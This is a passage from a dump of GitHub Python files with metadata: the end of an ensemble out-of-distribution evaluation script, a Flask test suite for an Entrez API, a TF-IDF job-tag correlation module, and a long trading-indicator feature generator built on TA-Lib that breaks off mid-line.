prior_networks.assessment.ood_detection import eval_ood_detect\n\ncommandLineParser = argparse.ArgumentParser(description='Compute features from labels.')\ncommandLineParser.add_argument('models_parent_dir', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('model_name', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('source_path', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('output_path', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--n_models', type=int, default=10,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--show', type=bool, default=True,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--overwrite', type=bool, default=False,\n help='which orignal data is saved should be loaded')\n\n\ndef main(argv=None):\n args = commandLineParser.parse_args()\n if not os.path.isdir('CMDs'):\n os.mkdir('CMDs')\n with open('CMDs/evaluate_ensemble_ood.txt', 'a') as f:\n f.write(' '.join(sys.argv) + '\\n')\n f.write('--------------------------------\\n')\n if os.path.isdir(args.output_path) and not args.overwrite:\n print(f'Directory {args.output_path}, exists. Exiting...')\n sys.exit()\n elif os.path.isdir(args.output_path) and args.overwrite:\n os.remove(args.output_path + '/*')\n else:\n os.makedirs(args.output_path)\n\n model_dirs = [os.path.join(args.models_parent_dir,\n args.model_name + \"{}\".format(int(i))) for i in range(0, args.n_models)]\n\n in_labels, in_probs = get_ensemble_predictions(model_dirs,\n args.source_path,\n args.n_models,\n prefix='id_')\n out_labels, out_probs = get_ensemble_predictions(model_dirs,\n args.source_path,\n args.n_models,\n prefix='ood_')\n\n id_uncertainties = ensemble_uncertainties(in_probs, epsilon=1e-10)\n ood_uncertainties = ensemble_uncertainties(out_probs, epsilon=1e-10)\n\n # Save uncertainties\n for key in id_uncertainties.keys():\n np.savetxt(os.path.join(args.output_path, key + '_id.txt'), id_uncertainties[key])\n np.savetxt(os.path.join(args.output_path, key + '_ood.txt'), ood_uncertainties[key])\n\n # Compute Labels\n in_domain = np.zeros_like(in_labels)\n out_domain = np.ones_like(out_labels)\n domain_labels = np.concatenate((in_domain, out_domain), axis=0)\n\n eval_ood_detect(domain_labels=domain_labels,\n in_uncertainties=id_uncertainties,\n out_uncertainties=ood_uncertainties,\n save_path=args.output_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KaosEngineer/PriorNetworks","sub_path":"prior_networks/ensembles/run/evaluate_ensemble_ood.py","file_name":"evaluate_ensemble_ood.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"} +{"seq_id":"21645662048","text":"import os\nimport seq_exp.seq_exp as seq_exp\nimport unittest\nimport tempfile\nimport ast\n\nclass EntrezTestCase(unittest.TestCase):\n def setUp(self):\n realapp, db = seq_exp.setup_api_and_db('sqlite:///:memory:')\n self.realapp = realapp\n self.db = db\n self.db_fd, realapp.config['DATABASE'] = tempfile.mkstemp()\n realapp.config['TESTING'] = True\n self.app = realapp.test_client()\n seq_exp.PROJECTS = {}\n\n def tearDown(self):\n self.db.close()\n os.close(self.db_fd)\n os.unlink(self.realapp.config['DATABASE'])\n\n def literal_eval(self, rv):\n resp_str = rv.data.decode(\"utf-8\")\n return ast.literal_eval(resp_str)\n\n def test_fetch_four_human_dna(self):\n #kind of fragile since relies upon external web server\n rv = self.app.get('/entrez/nucleotide', data=dict(term='human', retmax='4'))\n resp = self.literal_eval(rv)\n self.assertEqual(4, resp['count'])\n\n def test_fetch_five_mouse_protein(self):\n #kind of fragile since relies upon external web server\n rv = self.app.get('/entrez/protein', data=dict(term='mouse', retmax='5'))\n resp = self.literal_eval(rv)\n self.assertEqual(5, resp['count'])\n","repo_name":"johnbradley/seq_exp_rest","sub_path":"seq_exp/test/test_entrez.py","file_name":"test_entrez.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19180981715","text":"from sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.externals import joblib\nimport pandas as pd\nfrom DevJobs.settings import STACK_JOBS_DATA\n\nvectorizer = None\ntags_corr = None\ndf_tags = None\nPATH_DATA = STACK_JOBS_DATA # 'data/'\ntfidf_tags = None\n\ndef _aplicar_tfidf(palavras = []):\n palavras = [_clean_tranform_str(p) for p in palavras]\n matrix_tfidf = vectorizer.transform(palavras)\n \n return pd.DataFrame(\n matrix_tfidf.todense(),\n columns=vectorizer.get_feature_names()\n )\n\ndef _tag_similar(df_tags, df_tfidf_tags, df_tfidf_analizar):\n df_tfidf = df_tfidf_tags.append(df_tfidf_analizar, ignore_index=True)\n sim_matriz = cosine_similarity(df_tfidf)\n \n sim_serie = pd.Series(sim_matriz[-1]).sort_values(ascending=False)\n\n if sim_serie.iloc[1] > 0.4:\n index_tag = df_tags.loc[sim_serie.index[1]].name\n return df_tags.columns[index_tag]\n else: return None\n\n\ndef _tags_correlacionadas(tag):\n return tags_corr[ tag ].sort_values(ascending=False)[:20]\n\ndef _clean_tranform_str(texto):\n processado = ' '.join([x for x in texto])\n processado += ' ' + ' '.join([texto[i:i+2] for i, x in enumerate(texto[:-1])])\n return processado\n\ndef obter_tags_correlacionadas(descricao):\n tfidf_analizar = _aplicar_tfidf([descricao])\n tag_similar = _tag_similar(df_tags, tfidf_tags, tfidf_analizar)\n \n if not tag_similar: return []\n \n tags_correlacionadas = _tags_correlacionadas(tag_similar)\n return tags_correlacionadas.index.tolist()\n \n \ndef _inicializa():\n global tags_corr, tfidf_tags, df_tags, vectorizer\n\n df_tags = pd.read_csv(PATH_DATA + 'jobs_tags.csv')\n df_tags = df_tags.drop(['id'],axis=1)\n\n vectorizer = joblib.load(PATH_DATA + 'vectorizer_tags.dat')\n tags_corr = df_tags.fillna(0).corr()\n tfidf_tags = _aplicar_tfidf(df_tags.columns)\n \n_inicializa() ","repo_name":"GuilhermeDomith/dev-jobs","sub_path":"DevJobs/src/StackOverflowJobs/Tags.py","file_name":"Tags.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33123746721","text":"import logging\n\nimport pandas as pd\nimport talib\nfrom finta import TA as fin\n\nlogger = logging.getLogger(__name__)\n\ndef add_indicators_and_rename(df, previous_cols, prefix, name, series):\n nn = prefix + name + '_'\n\n if series is None:\n for col in df.columns:\n if col not in previous_cols:\n logger.debug(\"Added: \" + nn + col)\n df.rename(columns={col: nn + col}, inplace=True)\n\n if isinstance(series, pd.DataFrame):\n for col in series.columns:\n if col not in previous_cols:\n logger.debug(\"Added: \" + nn + col)\n df.rename(columns={col: nn + col}, inplace=True)\n\n if isinstance(series, pd.Series):\n logger.debug(\"Added: \" + prefix + name)\n df[prefix + name] = series\n\n return df\n\n\nclass IndicatorFiller():\n\n def fill(self, input_df, minimal=False, indicators=None):\n import pandas as pd\n import warnings\n\n warnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\n self.cols = input_df.columns\n MINIMAL_LENGTH = 2000\n\n def add(name, series, pre):\n add_indicators_and_rename(df, previous_cols=self.cols, prefix=pre, name=name, series=series)\n self.cols = df.columns\n\n def set_cols():\n self.cols = df.columns\n\n\n def check_indicator(name):\n if indicators is None:\n return True\n else:\n for indicator in indicators:\n if name in indicator or name == indicator:\n return True\n return False\n\n\n def check_indicator_add(name, prefix):\n nn = prefix + name\n if indicators is None:\n return True\n else:\n for indicator in indicators:\n if nn in indicator or nn == indicator:\n return True\n return False\n\n if minimal:\n df = input_df.tail(MINIMAL_LENGTH).copy().reset_index(drop=True)\n else:\n df = input_df.copy()\n\n close = df[\"close\"]\n high = df[\"high\"]\n low = df[\"low\"]\n open = df[\"open\"]\n volume = df[\"volume\"]\n prefix = \"fixed_\"\n\n # _____ _______ ____ _ _ ____\n # / _ \\ \\ / / ____| _ \\| | / \\ | _ \\\n # | | | \\ \\ / /| _| | |_) | | / _ \\ | |_) |\n # | |_| |\\ V / | |___| _ <| |___ / ___ \\| __/\n # \\___/ \\_/ |_____|_| \\_\\_____/_/ \\_\\_|\n if check_indicator(prefix + \"HT_TRENDLINE\"):\n real = talib.HT_TRENDLINE(close)\n df[prefix + \"HT_TRENDLINE\"] = real\n\n #if check_indicator(prefix + \"SAR\"):\n # real = talib.SAR(high, low, acceleration=0, maximum=0)\n # df[prefix + \"SAR\"] = real\n\n #if check_indicator(prefix + \"SAREXT\"):\n # real = talib.SAREXT(high, low, startvalue=0, offsetonreverse=0, accelerationinitlong=0, accelerationlong=0, accelerationmaxlong=0, accelerationinitshort=0, accelerationshort=0, accelerationmaxshort=0)\n # df[prefix + \"SAREXT\"] = real\n\n # ___ ____ ____ ___ _ _ _ _____ ___ ____\n # / _ \\/ ___| / ___|_ _| | | | / \\|_ _/ _ \\| _ \\\n # | | | \\___ \\| | | || | | | / _ \\ | || | | | |_) |\n # | |_| |___) | |___ | || |___| |___ / ___ \\| || |_| | _ <\n # \\___/|____/ \\____|___|_____|_____/_/ \\_\\_| \\___/|_| \\_\\\n if check_indicator(prefix + \"BOP\"):\n real = talib.BOP(open, high, low, close)\n df[prefix + \"BOP\"] = real\n\n # __ _____ _ _ _ __ __ _____\n # \\ \\ / / _ \\| | | | | | \\/ | ____|\n # \\ \\ / / | | | | | | | | |\\/| | _|\n # \\ V /| |_| | |__| |_| | | | | |___\n # \\_/ \\___/|_____\\___/|_| |_|_____|\n #if check_indicator(prefix + \"AD\"):\n # real = talib.AD(high, low, close, volume)\n # df[prefix + \"AD\"] = real\n #if check_indicator(prefix + \"OBV\"):\n # real = talib.OBV(close, volume)\n # df[prefix + \"OBV\"] = real\n\n # __ _____ _ _ _____ ___ _ ___ _______ __\n # \\ \\ / / _ \\| | / \\|_ _|_ _| | |_ _|_ _\\ \\ / /\n # \\ \\ / / | | | | / _ \\ | | | || | | | | | \\ V /\n # \\ V /| |_| | |___ / ___ \\| | | || |___ | | | | | |\n # \\_/ \\___/|_____/_/ \\_\\_| |___|_____|___| |_| |_|\n if check_indicator(prefix + \"TRANGE\"):\n real = talib.TRANGE(high, low, close)\n df[prefix + \"TRANGE\"] = real\n\n # ____ ____ ___ ____ _____\n # | _ \\| _ \\|_ _/ ___| ____|\n # | |_) | |_) || | | | _|\n # | __/| _ < | | |___| |___\n # |_| |_| \\_\\___\\____|_____|\n if check_indicator(prefix + \"AVGPRICE\"):\n real = talib.AVGPRICE(open, high, low, close)\n df[prefix + \"AVGPRICE\"] = real\n\n if check_indicator(prefix + \"MEDPRICE\"):\n real = talib.MEDPRICE(high, low)\n df[prefix + \"MEDPRICE\"] = real\n\n if check_indicator(prefix + \"TYPPRICE\"):\n real = talib.TYPPRICE(high, low, close)\n df[prefix + \"TYPPRICE\"] = real\n\n if check_indicator(prefix + \"WCLPRICE\"):\n real = talib.WCLPRICE(high, low, close)\n df[prefix + \"WCLPRICE\"] = real\n\n # ______ ______ _ _____\n # / ___\\ \\ / / ___| | | ____|\n # | | \\ V / | | | | _|\n # | |___ | || |___| |___| |___\n # \\____| |_| \\____|_____|_____|\n if check_indicator(prefix + \"HT_DCPERIOD\"):\n real = talib.HT_DCPERIOD(close)\n df[prefix + \"HT_DCPERIOD\"] = real\n\n if check_indicator(prefix + \"HT_DCPHASE\"):\n real = talib.HT_DCPHASE(close)\n df[prefix + \"HT_DCPHASE\"] = real\n\n inphase, quadrature = talib.HT_PHASOR(close)\n df[prefix + \"inphase\"] = inphase\n df[prefix + \"quadrature\"] = quadrature\n\n sine, leadsine = talib.HT_SINE(close)\n df[prefix + \"sine\"] = sine\n df[prefix + \"leadsine\"] = leadsine\n\n if check_indicator(prefix + \"HT_TRENDMODE\"):\n integer = talib.HT_TRENDMODE(close)\n df[prefix + \"HT_TRENDMODE\"] = integer\n\n # ____ _ _____ _____ _____ ____ _ _\n # | _ \\ / \\|_ _|_ _| ____| _ \\| \\ | |\n # | |_) / _ \\ | | | | | _| | |_) | \\| |\n # | __/ ___ \\| | | | | |___| _ <| |\\ |\n # |_| /_/ \\_\\_| |_| |_____|_| \\_\\_| \\_|\n if check_indicator(prefix + \"CDL2CROWS\"):\n integer = talib.CDL2CROWS(open, high, low, close)\n df[prefix + \"CDL2CROWS\"] = integer\n if check_indicator(prefix + \"CDL3BLACKCROWS\"):\n integer = talib.CDL3BLACKCROWS(open, high, low, close)\n df[prefix + \"CDL3BLACKCROWS\"] = integer\n if check_indicator(prefix + \"CDL3INSIDE\"):\n integer = talib.CDL3INSIDE(open, high, low, close)\n df[prefix + \"CDL3INSIDE\"] = integer\n if check_indicator(prefix + \"CDL3LINESTRIKE\"):\n integer = talib.CDL3LINESTRIKE(open, high, low, close)\n df[prefix + \"CDL3LINESTRIKE\"] = integer\n if check_indicator(prefix + \"CDL3OUTSIDE\"):\n integer = talib.CDL3OUTSIDE(open, high, low, close)\n df[prefix + \"CDL3OUTSIDE\"] = integer\n if check_indicator(prefix + \"CDL3STARSINSOUTH\"):\n integer = talib.CDL3STARSINSOUTH(open, high, low, close)\n df[prefix + \"CDL3STARSINSOUTH\"] = integer\n if check_indicator(prefix + \"CDL3WHITESOLDIERS\"):\n integer = talib.CDL3WHITESOLDIERS(open, high, low, close)\n df[prefix + \"CDL3WHITESOLDIERS\"] = integer\n if check_indicator(prefix + \"CDLABANDONEDBABY\"):\n integer = talib.CDLABANDONEDBABY(open, high, low, close, penetration=0)\n df[prefix + \"CDLABANDONEDBABY\"] = integer\n if check_indicator(prefix + \"CDLADVANCEBLOCK\"):\n integer = talib.CDLADVANCEBLOCK(open, high, low, close)\n df[prefix + \"CDLADVANCEBLOCK\"] = integer\n if check_indicator(prefix + \"CDLBELTHOLD\"):\n integer = talib.CDLBELTHOLD(open, high, low, close)\n df[prefix + \"CDLBELTHOLD\"] = integer\n if check_indicator(prefix + \"CDLBREAKAWAY\"):\n integer = talib.CDLBREAKAWAY(open, high, low, close)\n df[prefix + \"CDLBREAKAWAY\"] = integer\n if check_indicator(prefix + \"CDLCLOSINGMARUBOZU\"):\n integer = talib.CDLCLOSINGMARUBOZU(open, high, low, close)\n df[prefix + \"CDLCLOSINGMARUBOZU\"] = integer\n if check_indicator(prefix + \"CDLCONCEALBABYSWALL\"):\n integer = talib.CDLCONCEALBABYSWALL(open, high, low, close)\n df[prefix + \"CDLCONCEALBABYSWALL\"] = integer\n if check_indicator(prefix + \"CDLCOUNTERATTACK\"):\n integer = talib.CDLCOUNTERATTACK(open, high, low, close)\n df[prefix + \"CDLCOUNTERATTACK\"] = integer\n if check_indicator(prefix + \"CDLDARKCLOUDCOVER\"):\n integer = talib.CDLDARKCLOUDCOVER(open, high, low, close, penetration=0)\n df[prefix + \"CDLDARKCLOUDCOVER\"] = integer\n if check_indicator(prefix + \"CDLDOJI\"):\n integer = talib.CDLDOJI(open, high, low, close)\n df[prefix + \"CDLDOJI\"] = integer\n if check_indicator(prefix + \"CDLDOJISTAR\"):\n integer = talib.CDLDOJISTAR(open, high, low, close)\n df[prefix + \"CDLDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLDRAGONFLYDOJI\"):\n integer = talib.CDLDRAGONFLYDOJI(open, high, low, close)\n df[prefix + \"CDLDRAGONFLYDOJI\"] = integer\n if check_indicator(prefix + \"CDLENGULFING\"):\n integer = talib.CDLENGULFING(open, high, low, close)\n df[prefix + \"CDLENGULFING\"] = integer\n if check_indicator(prefix + \"CDLEVENINGDOJISTAR\"):\n integer = talib.CDLEVENINGDOJISTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLEVENINGDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLEVENINGSTAR\"):\n integer = talib.CDLEVENINGSTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLEVENINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLGAPSIDESIDEWHITE\"):\n integer = talib.CDLGAPSIDESIDEWHITE(open, high, low, close)\n df[prefix + \"CDLGAPSIDESIDEWHITE\"] = integer\n if check_indicator(prefix + \"CDLGRAVESTONEDOJI\"):\n integer = talib.CDLGRAVESTONEDOJI(open, high, low, close)\n df[prefix + \"CDLGRAVESTONEDOJI\"] = integer\n if check_indicator(prefix + \"CDLHAMMER\"):\n integer = talib.CDLHAMMER(open, high, low, close)\n df[prefix + \"CDLHAMMER\"] = integer\n if check_indicator(prefix + \"CDLHANGINGMAN\"):\n integer = talib.CDLHANGINGMAN(open, high, low, close)\n df[prefix + \"CDLHANGINGMAN\"] = integer\n if check_indicator(prefix + \"CDLHARAMI\"):\n integer = talib.CDLHARAMI(open, high, low, close)\n df[prefix + \"CDLHARAMI\"] = integer\n if check_indicator(prefix + \"CDLHARAMICROSS\"):\n integer = talib.CDLHARAMICROSS(open, high, low, close)\n df[prefix + \"CDLHARAMICROSS\"] = integer\n if check_indicator(prefix + \"CDLHIGHWAVE\"):\n integer = talib.CDLHIGHWAVE(open, high, low, close)\n df[prefix + \"CDLHIGHWAVE\"] = integer\n if check_indicator(prefix + \"CDLHIKKAKE\"):\n integer = talib.CDLHIKKAKE(open, high, low, close)\n df[prefix + \"CDLHIKKAKE\"] = integer\n if check_indicator(prefix + \"CDLHIKKAKEMOD\"):\n integer = talib.CDLHIKKAKEMOD(open, high, low, close)\n df[prefix + \"CDLHIKKAKEMOD\"] = integer\n if check_indicator(prefix + \"CDLHOMINGPIGEON\"):\n integer = talib.CDLHOMINGPIGEON(open, high, low, close)\n df[prefix + \"CDLHOMINGPIGEON\"] = integer\n if check_indicator(prefix + \"CDLIDENTICAL3CROWS\"):\n integer = talib.CDLIDENTICAL3CROWS(open, high, low, close)\n df[prefix + \"CDLIDENTICAL3CROWS\"] = integer\n if check_indicator(prefix + \"CDLINNECK\"):\n integer = talib.CDLINNECK(open, high, low, close)\n df[prefix + \"CDLINNECK\"] = integer\n if check_indicator(prefix + \"CDLINVERTEDHAMMER\"):\n integer = talib.CDLINVERTEDHAMMER(open, high, low, close)\n df[prefix + \"CDLINVERTEDHAMMER\"] = integer\n if check_indicator(prefix + \"CDLKICKING\"):\n integer = talib.CDLKICKING(open, high, low, close)\n df[prefix + \"CDLKICKING\"] = integer\n if check_indicator(prefix + \"CDLKICKINGBYLENGTH\"):\n integer = talib.CDLKICKINGBYLENGTH(open, high, low, close)\n df[prefix + \"CDLKICKINGBYLENGTH\"] = integer\n if check_indicator(prefix + \"CDLLADDERBOTTOM\"):\n integer = talib.CDLLADDERBOTTOM(open, high, low, close)\n df[prefix + \"CDLLADDERBOTTOM\"] = integer\n if check_indicator(prefix + \"CDLLONGLEGGEDDOJI\"):\n integer = talib.CDLLONGLEGGEDDOJI(open, high, low, close)\n df[prefix + \"CDLLONGLEGGEDDOJI\"] = integer\n if check_indicator(prefix + \"CDLLONGLINE\"):\n integer = talib.CDLLONGLINE(open, high, low, close)\n df[prefix + \"CDLLONGLINE\"] = integer\n if check_indicator(prefix + \"CDLMARUBOZU\"):\n integer = talib.CDLMARUBOZU(open, high, low, close)\n df[prefix + \"CDLMARUBOZU\"] = integer\n if check_indicator(prefix + \"CDLMATCHINGLOW\"):\n integer = talib.CDLMATCHINGLOW(open, high, low, close)\n df[prefix + \"CDLMATCHINGLOW\"] = integer\n if check_indicator(prefix + \"CDLMATHOLD\"):\n integer = talib.CDLMATHOLD(open, high, low, close, penetration=0)\n df[prefix + \"CDLMATHOLD\"] = integer\n if check_indicator(prefix + \"CDLMORNINGDOJISTAR\"):\n integer = talib.CDLMORNINGDOJISTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLMORNINGDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLMORNINGSTAR\"):\n integer = talib.CDLMORNINGSTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLMORNINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLONNECK\"):\n integer = talib.CDLONNECK(open, high, low, close)\n df[prefix + \"CDLONNECK\"] = integer\n if check_indicator(prefix + \"CDLPIERCING\"):\n integer = talib.CDLPIERCING(open, high, low, close)\n df[prefix + \"CDLPIERCING\"] = integer\n if check_indicator(prefix + \"CDLRICKSHAWMAN\"):\n integer = talib.CDLRICKSHAWMAN(open, high, low, close)\n df[prefix + \"CDLRICKSHAWMAN\"] = integer\n if check_indicator(prefix + \"CDLRISEFALL3METHODS\"):\n integer = talib.CDLRISEFALL3METHODS(open, high, low, close)\n df[prefix + \"CDLRISEFALL3METHODS\"] = integer\n if check_indicator(prefix + \"CDLSEPARATINGLINES\"):\n integer = talib.CDLSEPARATINGLINES(open, high, low, close)\n df[prefix + \"CDLSEPARATINGLINES\"] = integer\n if check_indicator(prefix + \"CDLSHOOTINGSTAR\"):\n integer = talib.CDLSHOOTINGSTAR(open, high, low, close)\n df[prefix + \"CDLSHOOTINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLSHORTLINE\"):\n integer = talib.CDLSHORTLINE(open, high, low, close)\n df[prefix + \"CDLSHORTLINE\"] = integer\n if check_indicator(prefix + \"CDLSPINNINGTOP\"):\n integer = talib.CDLSPINNINGTOP(open, high, low, close)\n df[prefix + \"CDLSPINNINGTOP\"] = integer\n if check_indicator(prefix + \"CDLSTALLEDPATTERN\"):\n integer = talib.CDLSTALLEDPATTERN(open, high, low, close)\n df[prefix + \"CDLSTALLEDPATTERN\"] = integer\n if check_indicator(prefix + \"CDLSTICKSANDWICH\"):\n integer = talib.CDLSTICKSANDWICH(open, high, low, close)\n df[prefix + \"CDLSTICKSANDWICH\"] = integer\n if check_indicator(prefix + \"CDLTAKURI\"):\n integer = talib.CDLTAKURI(open, high, low, close)\n df[prefix + \"CDLTAKURI\"] = integer\n if check_indicator(prefix + \"CDLTASUKIGAP\"):\n integer = talib.CDLTASUKIGAP(open, high, low, close)\n df[prefix + \"CDLTASUKIGAP\"] = integer\n if check_indicator(prefix + \"CDLTHRUSTING\"):\n integer = talib.CDLTHRUSTING(open, high, low, close)\n df[prefix + \"CDLTHRUSTING\"] = integer\n if check_indicator(prefix + \"CDLTRISTAR\"):\n integer = talib.CDLTRISTAR(open, high, low, close)\n df[prefix + \"CDLTRISTAR\"] = integer\n if check_indicator(prefix + \"CDLUNIQUE3RIVER\"):\n integer = talib.CDLUNIQUE3RIVER(open, high, low, close)\n df[prefix + \"CDLUNIQUE3RIVER\"] = integer\n if check_indicator(prefix + \"CDLUPSIDEGAP2CROWS\"):\n integer = talib.CDLUPSIDEGAP2CROWS(open, high, low, close)\n df[prefix + \"CDLUPSIDEGAP2CROWS\"] = integer\n if check_indicator(prefix + \"CDLXSIDEGAP3METHODS\"):\n integer = talib.CDLXSIDEGAP3METHODS(open, high, low, close)\n df[prefix + \"CDLXSIDEGAP3METHODS\"] = integer\n\n # _____ ___ _ _ _____ _\n # | ___|_ _| \\ | |_ _|/ \\\n # | |_ | || \\| | | | / _ \\\n # | _| | || |\\ | | |/ ___ \\\n # |_| |___|_| \\_| |_/_/ \\_\\\n\n\n #real = fin.DYMI(df)\n #add(\"DYMI\", real, prefix)\n set_cols()\n if check_indicator_add(\"PSAR\", prefix):\n real = fin.PSAR(df)\n add(\"PSAR\", real, prefix)\n\n if check_indicator_add(\"KST\", prefix): \n tmp = fin.KST(df)\n add(\"KST\", tmp, prefix)\n\n if check_indicator_add(\"COPP\", prefix): \n real = fin.COPP(df)\n add(\"COPP\", real, prefix)\n\n if check_indicator_add(\"PIVOT\", prefix): \n tmp = fin.PIVOT(df)\n add(\"PIVOT\", tmp, prefix)\n\n if check_indicator_add(\"PIVOT_FIB\", prefix): \n tmp = fin.PIVOT_FIB(df)\n add(\"PIVOT_FIB\", tmp, prefix)\n\n if check_indicator_add(\"UO\", prefix): \n real = fin.UO(df)\n add(\"UO\", real, prefix)\n\n if check_indicator_add(\"EBBP\", prefix): \n tmp = fin.EBBP(df)\n add(\"EBBP\", tmp, prefix)\n\n # ____ _ _ ____ _____ ___ __ __\n # / ___| | | / ___|_ _/ _ \\| \\/ |\n # | | | | | \\___ \\ | || | | | |\\/| |\n # | |___| |_| |___) || || |_| | | | |\n # \\____|\\___/|____/ |_| \\___/|_| |_|\n #if check_indicator_add(\"wavepm_bands\", prefix):\n # tmp = cust.calculate_wavepm_bands(df, lookback=100, wavepm_column=\"close\", periods=None)\n # df.drop(list(df.filter(regex='wavePM')), axis=1, inplace=True)\n # tmp.drop(list(df.filter(regex='wavePM')), axis=1, inplace=True)\n # add(\"wavepm_bands\", tmp, prefix)\n\n #if check_indicator_add(\"log_returns\", prefix):\n # tmp = cust.log_returns(close)\n # add(\"log_returns\", tmp, prefix)\n #tmp = cust.sessions(df)\n # add(\"sessions\", tmp, prefix)\n #if check_indicator_add(\"pivots_daily_weekly\", prefix):\n # tmp = cust.pivots_daily_weekly(df)\n # add(\"pivots_daily_weekly\", tmp, prefix)\n\n #if check_indicator_add(\"signal_noise_ratio\", prefix):\n # tmp = cust.signal_noise_ratio(df)\n # add(\"signal_noise_ratio\", tmp, prefix)\n\n #if check_indicator_add(\"range_filter_dw\", prefix):\n # tmp = cust.range_filter_dw(df)\n # add(\"range_filter_dw\", tmp, prefix)\n\n periods = [7, 9, 14, 20, 30, 40, 50, 75, 100, 125, 150, 175, 200, 300, 400]\n periods.reverse()\n for period in periods:\n # Beim Minimal-Modus wird immer weniger genommen damits schneller geht. Man braucht eh nur -1.\n if minimal:\n df = df.tail(max(300, period * 4)).copy().reset_index(drop=True)\n\n logger.debug(f\"Period: {period}\")\n\n precision_check = period <= 300\n\n prefix = str(period) + \"_\"\n period02 = max(2, int(period * 0.2))\n period03 = max(2, int(period * 0.33))\n period05 = max(2, int(period * 0.5))\n period07 = max(2, int(period * 0.75))\n\n # _____ _______ ____ _ _ ____\n # / _ \\ \\ / / ____| _ \\| | / \\ | _ \\\n # | | | \\ \\ / /| _| | |_) | | / _ \\ | |_) |\n # | |_| |\\ V / | |___| _ <| |___ / ___ \\| __/\n # \\___/ \\_/ |_____|_| \\_\\_____/_/ \\_\\_|\n if check_indicator(prefix + \"upperband125\") or check_indicator(prefix + \"middleband125\") or check_indicator(prefix + \"lowerband125\"):\n upperband, middleband, lowerband = talib.BBANDS(close, timeperiod=period, nbdevup=1.25, nbdevdn=1.25, matype=0)\n df[prefix + \"upperband125\"] = upperband\n df[prefix + \"middleband125\"] = middleband\n df[prefix + \"lowerband125\"] = lowerband\n\n if check_indicator(prefix + \"upperband200\") or check_indicator(prefix + \"middleband200\") or check_indicator(prefix + \"lowerband200\"):\n upperband, middleband, lowerband = talib.BBANDS(close, timeperiod=period, nbdevup=2, nbdevdn=2, matype=0)\n df[prefix + \"upperband200\"] = upperband\n df[prefix + \"middleband200\"] = middleband\n df[prefix + \"lowerband200\"] = lowerband\n\n if check_indicator(prefix + \"DEMA\"):\n real = talib.DEMA(close, timeperiod=period)\n df[prefix + \"DEMA\"] = real\n\n if check_indicator(prefix + \"EMA\"):\n real = talib.EMA(close, timeperiod=period)\n df[prefix + \"EMA\"] = real\n\n if check_indicator(prefix + \"KAMA\"):\n real = talib.KAMA(close, timeperiod=period)\n df[prefix + \"KAMA\"] = real\n\n if check_indicator(prefix + \"MIDPOINT\"):\n real = talib.MIDPOINT(close, timeperiod=period)\n df[prefix + \"MIDPOINT\"] = real\n\n if check_indicator(prefix + \"MIDPRICE\"):\n real = talib.MIDPRICE(high, low, timeperiod=period)\n df[prefix + \"MIDPRICE\"] = real\n\n if check_indicator(prefix + \"SMA\"):\n real = talib.SMA(close, timeperiod=period)\n df[prefix + \"SMA\"] = real\n\n if check_indicator(prefix + \"T3\"):\n real = talib.T3(close, timeperiod=period, vfactor=0)\n df[prefix + \"T3\"] = real\n\n if check_indicator(prefix + \"TEMA\"):\n real = talib.TEMA(close, timeperiod=period)\n df[prefix + \"TEMA\"] = real\n\n if check_indicator(prefix + \"TRIMA\"):\n real = talib.TRIMA(close, timeperiod=period)\n df[prefix + \"TRIMA\"] = real\n\n if check_indicator(prefix + \"WMA\"):\n real = talib.WMA(close, timeperiod=period)\n df[prefix + \"WMA\"] = real\n\n # __ __ ___ __ __ _____ _ _ _____ _ _ __ __\n # | \\/ |/ _ \\| \\/ | ____| \\ | |_ _| | | | \\/ |\n # | |\\/| | | | | |\\/| | _| | \\| | | | | | | | |\\/| |\n # | | | | |_| | | | | |___| |\\ | | | | |_| | | | |\n # |_| |_|\\___/|_| |_|_____|_| \\_| |_| \\___/|_| |_|\n if precision_check:\n if check_indicator(prefix + \"ADX\"):\n real = talib.ADX(high, low, close, timeperiod=period)\n df[prefix + \"ADX\"] = real\n\n if check_indicator(prefix + \"ADXR\"):\n real = talib.ADXR(high, low, close, timeperiod=period)\n df[prefix + \"ADXR\"] = real\n\n if check_indicator(prefix + \"APO\"):\n real = talib.APO(close, fastperiod=period05, slowperiod=period, matype=0)\n df[prefix + \"APO\"] = real\n\n if check_indicator(prefix + \"AROONOSC\"):\n real = talib.AROONOSC(high, low, timeperiod=period)\n df[prefix + \"AROONOSC\"] = real\n\n if check_indicator(prefix + \"CCI\"):\n real = talib.CCI(high, low, close, timeperiod=period)\n df[prefix + \"CCI\"] = real\n\n if precision_check:\n if check_indicator(prefix + \"CMO\"):\n real = talib.CMO(close, timeperiod=period)\n df[prefix + \"CMO\"] = real\n\n if check_indicator(prefix + \"DX\"):\n real = talib.DX(high, low, close, timeperiod=period)\n df[prefix + \"DX\"] = real\n\n if check_indicator(prefix + \"MFI\"):\n real = talib.MFI(high, low, close, volume, timeperiod=period)\n df[prefix + \"MFI\"] = real\n\n if check_indicator(prefix + \"MINUS_DI\"):\n real = talib.MINUS_DI(high, low, close, timeperiod=period)\n df[prefix + \"MINUS_DI\"] = real\n\n if check_indicator(prefix + \"MINUS_DM\"):\n real = 